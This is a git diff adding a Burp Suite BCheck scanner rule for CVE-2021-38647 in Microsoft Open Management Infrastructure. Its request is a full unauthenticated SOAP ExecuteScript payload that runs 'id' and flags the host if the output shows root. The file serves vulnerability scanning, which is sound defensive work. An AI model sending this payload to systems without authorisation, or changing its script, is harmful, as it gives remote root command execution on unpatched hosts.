diff --git a/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck b/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck
new file mode 100644
index 0000000..626ca5a
--- /dev/null
+++ b/vulnerabilities-CVEd/CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE.bcheck	
@@ -0,0 +1,61 @@
+metadata:
+    language: v1-beta
+    name: "CVE-2021-38647 - Microsoft Open Management Infrastructure - RCE"
+    description: "Checks for CVE-2021-38647"
+    author: "Dolph Flynn"
+    tags: "CVE-2021-38647", "omi", "microsoft"
+
+
+given host then
+    send request called check:
+        `POST /wsman HTTP/1.1
+Host: {base.request.url.host}
+Content-Type: application/soap+xml;charset=UTF-8
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+
+<s:Envelope
+  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"
+  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"
+  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"
+  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"
+  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"
+  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"
+  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">
+  <s:Header>
+    <a:To>HTTP://{base.request.url.host}/wsman/</a:To>
+    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>
+    <a:ReplyTo>
+      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>
+    </a:ReplyTo>
+    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>
+    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>
+    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>
+    <w:OperationTimeout>PT1M30S</w:OperationTimeout>
+    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>
+    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>
+    <w:OptionSet s:mustUnderstand=\"true\"/>
+    <w:SelectorSet>
+      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>
+    </w:SelectorSet>
+  </s:Header>
+  <s:Body>
+    <p:ExecuteScript_INPUT
+      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">
+      <p:Script>aWQ=</p:Script>
+      <p:Arguments/>
+      <p:timeout>0</p:timeout>
+      <p:b64encoded>true</p:b64encoded>
+    </p:ExecuteScript_INPUT>
+  </s:Body>
+</s:Envelope>
+`
+
+    if ({check.response.body} matches "\b<p:StdOut>\b" and {check.response.body} matches "\buid=0(root) gid=0(root) groups=0\b") then
+
+        report issue:
+            severity: high
+            confidence: tentative
+            detail: "Microsoft Open Management Infrastructure - Remote Code Execution."
+
+    end if